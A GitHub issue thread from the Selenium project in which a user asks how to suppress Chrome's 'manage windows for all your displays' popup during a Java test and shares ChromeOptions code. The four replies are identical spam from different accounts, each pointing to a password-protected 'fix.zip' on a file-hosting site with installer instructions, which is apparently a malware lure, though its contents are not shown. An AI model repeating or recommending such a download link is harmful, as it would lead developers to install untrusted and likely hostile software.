### ISSUE TITLE
[🐛 Bug]: Unable to handle window management popup while opening a new window

### ISSUE THREAD

**Issue by praveenpappala** [SeleniumHQ/selenium#14437]
### What happened?

While automating a test case in Java selenium, I am clicking on a button and it will try to open a new window but here chrome popup -'manage windows for all your displays' is appearing as below given screenshot

![Screenshot 2024-08-26 144345](https://github.com/user-attachments/assets/f63d3e5a-464e-4be8-a928-a95a230ff5c0)

### How can we reproduce the issue?

```shell
To resolve the above issue, I used the below code for the chromeOptions :

Map<String, Object> prefs = new HashMap<String, Object>();
prefs.put("profile.default_content_setting_values.notifications", 2);
prefs.put("profile.default_content_setting_values.popups", 0);				
DesiredCapabilities caps = new DesiredCapabilities();
LoggingPreferences logPrefs = new LoggingPreferences();
logPrefs.enable(LogType.BROWSER, Level.ALL);
logPrefs.enable(LogType.PERFORMANCE, Level.ALL);
caps.setCapability("goog:loggingPrefs", logPrefs);
ChromeOptions options = new ChromeOptions();
options.addArguments("--ignore-ssl-errors=yes");
options.addArguments("--ignore-certificate-errors");
// set ExperimentalOption - prefs
options.setExperimentalOption("prefs", prefs);
options.addArguments("use-fake-ui-for-media-stream");
options.addArguments("use-fake-device-for-media-stream=false");
options.addArguments("--remote-allow-origins=*");
options.addArguments("--disable-blink-features=AutomationControlled");



I tried by putting all the values 0,1 and 2 but still 'manage windows for all your displays' chrome popup is appearing.
correct me if I did any mistake.
```

### Relevant log output

```shell
Not handling that 'manage windows for all your displays' chrome popup
```

### Operating System

window 10

### Selenium version

Selenium 4.19.1

### What are the browser(s) and version(s) where you see this issue?

Chrome

### What are the browser driver(s) and version(s) where you see this issue?

chrome version - 127.0.6533.120

### Are you using Selenium Grid?

No

**Comment by ZiQiangZhou** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by swaggy111** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by xiaobai-marker** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
